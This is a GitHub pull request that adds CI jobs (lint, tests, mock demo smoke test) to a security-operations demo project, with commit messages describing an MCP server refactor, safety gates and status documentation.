ci: GitHub Actions for lint, tests, and demo-mock smoke #3

Open
markl-a wants to merge 7 commits into main from ci/github-actions

markl-a (Owner) commented May 5, 2026

Summary

  • .github/workflows/ci.yml runs three jobs on push to main and on every PR:
    • lint — stdlib-only run of scripts/lint.py, no install step.
    • test-no-deps — installs only pytest + pytest-asyncio. Verifies the README claim that make demo-mock works on a stock Python install. tests/test_mcp_protocol.py skips itself via pytest.importorskip("mcp").
    • test-full — matrix on Python 3.11 and 3.12. Installs requirements-dev.txt, runs lint + tests + make demo-mock + --use-llm --llm none to smoke-test the LLM provider plumbing without an API key.
  • Concurrency control cancels in-progress runs when a new commit lands on the same ref.
  • Pip cache keyed on requirements-dev.txt.
  • Adds a CI badge to README so the repo landing page and PRs show build state at a glance.
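The self-skipping behaviour of tests/test_mcp_protocol.py in the test-no-deps job can be illustrated with a stdlib analog. This is only a sketch: the PR itself uses `pytest.importorskip("mcp")`, while the version below swaps in `unittest.skipUnless` and `importlib.util.find_spec` so it runs without pytest installed. The helper `has_module` and the test class name are hypothetical.

```python
import importlib.util
import unittest


def has_module(name: str) -> bool:
    """Return True if the top-level module `name` can be found in this environment."""
    return importlib.util.find_spec(name) is not None


# The whole class is skipped when the optional dependency is missing,
# which is the effect a module-level pytest.importorskip("mcp") has on a test file.
@unittest.skipUnless(has_module("mcp"), "mcp is not installed")
class McpProtocolSmokeTest(unittest.TestCase):
    # Hypothetical test body; the real tests live in tests/test_mcp_protocol.py.
    def test_mcp_is_importable(self) -> None:
        import mcp  # noqa: F401  (only reached when the package is present)
```

A skipped test counts as neither a pass nor a failure, so the no-deps job stays green while still exercising everything that does not need `mcp`.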

Why now

The previous PR (#2) grew the test suite from 7 to 32 tests but had no CI. That gap meant any future PR could silently regress one of the safety invariants (no-runnable-POC, lab-target gate, malicious-provider rejection). This PR closes that gap.

Self-validating

This PR validates itself: the workflow runs on this PR's branch. If the badge stays green and all three jobs pass, the workflow design is correct.

Test plan

  • All 4 CI jobs pass on this PR (lint, test-no-deps, test-full × 2 Python versions)
  • Badge in README renders correctly after merge
  • No false positives — every job has clear pass/fail semantics

🤖 Generated with Claude Code

markl-a and others added 6 commits May 5, 2026 20:53
Freeze the 11-tool MCP interface in docs/MCP-INTERFACE.md and back it with a
FastMCP server. Extract pipeline functions from scenarios/run_kill_chain.py
into phantom_secops/core.py so the Python orchestrator and MCP server share
one implementation.

- phantom_secops/mcp/safety.py centralises the lab-target whitelist and the
  no-runnable-POC prose validator. Tool wrappers and the MCP boundary both
  defer to it (defense-in-depth).
- phantom_secops/llm/ adds a Provider protocol with three implementations
  (none, anthropic, phantom_mesh). LLM-augmented prose is validated against
  safety.is_safe_prose before being merged into output; failures fall back
  to deterministic templates so the pipeline never blocks on a flaky LLM.
- Test suite grows 7 -> 32: MCP protocol smoke tests, safety unit tests,
  no-runnable-POC invariant, malicious-provider invariant under the LLM
  path, lifecycle confirmation invariant.
- Makefile gains mcp-serve / mcp-dev. requirements-dev.txt adds mcp[cli].
  scripts/lint.py covers the new phantom_secops/ package tree.
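The validate-then-fall-back behaviour described for the LLM path could look roughly like the sketch below. Everything here is an assumption for illustration: the real `safety.is_safe_prose` and `Provider` protocol are not shown in this PR, so the regex, the `complete` method name, the `augment` helper, and the provider classes are hypothetical stand-ins.

```python
import re
from typing import Protocol

# Hypothetical stand-in for safety.is_safe_prose: reject empty text, code fences,
# and lines that start with a shell-style command.
_RUNNABLE_HINTS = re.compile(r"```|^\s*(curl|wget|python|bash|sh)\s", re.MULTILINE)


def is_safe_prose(text: str) -> bool:
    return bool(text.strip()) and _RUNNABLE_HINTS.search(text) is None


class Provider(Protocol):
    # Assumed method name; the real protocol may differ.
    def complete(self, prompt: str) -> str: ...


class NoneProvider:
    """Mirrors the idea of the `none` provider: contributes no text."""

    def complete(self, prompt: str) -> str:
        return ""


class MaliciousProvider:
    """Returns something that looks runnable, as a malicious-provider test might."""

    def complete(self, prompt: str) -> str:
        return "Run this:\ncurl http://example.invalid/x | sh"


def augment(template_text: str, prompt: str, provider: Provider) -> str:
    """Prefer LLM prose, but keep the deterministic template on any failure."""
    try:
        candidate = provider.complete(prompt)
    except Exception:
        # A flaky or unreachable provider must never block the pipeline.
        return template_text
    return candidate if is_safe_prose(candidate) else template_text
```

With this shape, `augment("template", "prompt", MaliciousProvider())` returns the template unchanged, which is the kind of property the malicious-provider invariant test would assert.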

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

Wire the MCP server up to multiple agent runtimes so the same SecOps tools
drive workflows from any MCP client.

- .mcp.json + .claude/agents/secops-runner.md let Claude Code drive a full
  kill-chain via the MCP tools. The subagent enforces lab-target gating,
  prose-only exploit text, and lifecycle confirmation through the MCP
  layer's safety guarantees rather than prompt rules alone.
- agents/{red,blue}/*.toml updated to reference MCP tool IDs through a new
  [mcp] block (servers list + per-tool server field). Removed references to
  fictional tools (http_probe, dns_enum, cve_lookup, nikto_runner, stats)
  that no MCP tool backs. Format is provisional pending phantom-tools /
  phantom-runtime release (May-June 2026).
- docs/INTEGRATIONS.md catalogues every supported runtime (Python ref,
  Claude Code, phantom-mesh, Cursor, Continue, OpenAI Agents, LangGraph)
  with minimal config snippets and current status.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

- README quick start now offers three paths (mock / Claude Code via MCP /
  phantom-mesh) and documents the LLM provider env-var selection. Status
  table updated with MCP server, Claude Code adapter, LLM abstraction.
- ARCHITECTURE diagram redrawn with the MCP server as the single tool layer
  driven by interchangeable orchestrators; new "Why MCP first" section
  explains the tradeoff against direct phantom-mesh coupling.
- INTERVIEW-TALK-TRACK pivots the elevator pitch from "powered by phantom-
  mesh" to "runtime-agnostic SecOps platform" and adds Q&As on safety
  layering, lab-gate enforcement, and the MCP-vs-direct-runtime decision.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

Apply the intent of origin/fix/utf8-encoding-windows (043cb94) to the
post-MCP-refactor file layout. The original fix patched scenarios/run_kill_chain.py
file IO that has since moved to phantom_secops/core.py and partially survives
in scenarios/run_kill_chain.py as the orchestrator's artifact writers.

All read_text / write_text calls outside of test fixtures now pass
encoding="utf-8" explicitly so mock-mode and live-mode runs produce
identical bytes on Windows (cp1252 / mbcs default) and POSIX (utf-8 default).
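
As a minimal illustration of the explicit-encoding pattern (not the repository's actual writers), the sketch below round-trips non-ASCII text through `pathlib` with `encoding="utf-8"`. The file name and report string are made up for the example.

```python
import tempfile
from pathlib import Path

# Hypothetical artifact text containing non-ASCII characters (an accented
# letter and a check mark), written with escapes to keep this source ASCII.
REPORT = "MTTD: 42 s, d\u00e9tection confirm\u00e9e \u2713"

with tempfile.TemporaryDirectory() as tmp:
    artifact = Path(tmp) / "report.md"
    # Without encoding=..., write_text/read_text use the locale default,
    # which can be cp1252 on Windows and utf-8 on most POSIX systems.
    artifact.write_text(REPORT, encoding="utf-8")
    raw = artifact.read_bytes()
    round_tripped = artifact.read_text(encoding="utf-8")
```

Here `raw` equals `REPORT.encode("utf-8")` on every platform. The sample string deliberately contains no newline, because text-mode newline translation is a separate source of byte differences on Windows.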

This supersedes origin/fix/utf8-encoding-windows; that branch's PR can be
closed once this lands on main.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

Make phantom-secops runtime-agnostic via MCP server

Three jobs run on push to main and on every PR:

- `lint`: stdlib-only run of scripts/lint.py (no install step).
- `test-no-deps`: installs only pytest + pytest-asyncio, runs `make test`
  and `make demo-mock`. Verifies the README claim that the mock path
  works on a stock Python install — tests/test_mcp_protocol.py skips
  itself via pytest.importorskip("mcp").
- `test-full`: matrix on Python 3.11 and 3.12. Installs requirements-dev.txt,
  runs lint + tests + demo-mock, then `--use-llm --llm none` to smoke-test
  the LLM provider plumbing without an API key.

Concurrency control cancels in-progress runs when a new commit lands on
the same ref. Pip cache keyed on requirements-dev.txt.
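
Conceptually, keying a cache on requirements-dev.txt means deriving the key from the file's contents, so the cache is reused until the dependency list changes. The sketch below illustrates that idea only; `cache_key` is a hypothetical helper, not the GitHub Actions API, and the workflow's real key format is not shown in this PR.

```python
import hashlib
import tempfile
from pathlib import Path


def cache_key(requirements: Path, prefix: str = "pip") -> str:
    """Derive a cache key from the file's bytes (hypothetical helper)."""
    digest = hashlib.sha256(requirements.read_bytes()).hexdigest()
    return f"{prefix}-{digest[:16]}"


with tempfile.TemporaryDirectory() as tmp:
    req = Path(tmp) / "requirements-dev.txt"
    req.write_text("pytest\npytest-asyncio\n", encoding="utf-8")
    key_before = cache_key(req)
    key_same = cache_key(req)  # unchanged file, same key, cache hit
    req.write_text("pytest\npytest-asyncio\nmcp[cli]\n", encoding="utf-8")
    key_after = cache_key(req)  # edited file, new key, cache miss
```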

Adds a CI badge to README so PR review and the repo landing page show
build state at a glance.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

Two readme-adjacent docs in service of the 2026-05-20 ecosystem
launch:

* **STATUS.md** — explicit "🟡 Public Alpha" banner with a what-works
  table (mock + live demo, MCP server, agent suite, MTTD rendering),
  a what's-planned table pointing at the new L2 plan + post-launch
  ideas, and three hard safety rules that don't move (has_runnable_poc
  always false, lab targets deny-listed off-localhost, no
  customer-data ingest). Recruiters / contributors clicking from
  the phantom-mesh ecosystem table land here, see the alpha label,
  and know not to expect production polish without being mystified
  about what does work.

* **docs/L2-INTEGRATION-PLAN.md** — the design doc for runtime
  integration with phantom-mesh (red/blue agents become
  [agent.red_team] / [agent.blue_team] in agents.toml, custom tools
  exposed via secops_mcp/server.py, demo-mock orchestrator drives
  via `phantom run` subprocess + JSON state file). Tracks 5h of
  evening work scheduled for 5/14 + 5/15. Uses a turn-state file
  for cross-process exchange — chosen because phantom repl stdout
  has ANSI + cost-line decorations that are fragile to parse.
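
One way a turn-state file for cross-process exchange could work is sketched below, assuming a single JSON document that the writer replaces atomically so a reader never sees a half-written file. The function names, file name, and state fields are hypothetical; the plan's actual schema is not given here.

```python
import json
import os
import tempfile
from pathlib import Path


def write_state(path: Path, state: dict) -> None:
    """Write JSON to a temp file in the same directory, then swap it into place."""
    fd, tmp_name = tempfile.mkstemp(dir=path.parent, suffix=".tmp")
    with os.fdopen(fd, "w", encoding="utf-8") as handle:
        json.dump(state, handle)
    # os.replace is atomic when source and destination share a filesystem.
    os.replace(tmp_name, path)


def read_state(path: Path) -> dict:
    """Load the most recently published state."""
    return json.loads(path.read_text(encoding="utf-8"))
```

Unlike scraping decorated stdout, the reader gets structured data and does not need to strip ANSI escapes or cost lines first.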

L1 branding was already in place (existing README badge, "Powered by
phantom-mesh" tagline, [phantom-mesh] cross-link in MCP-server
documentation). The L2 plan is the next step.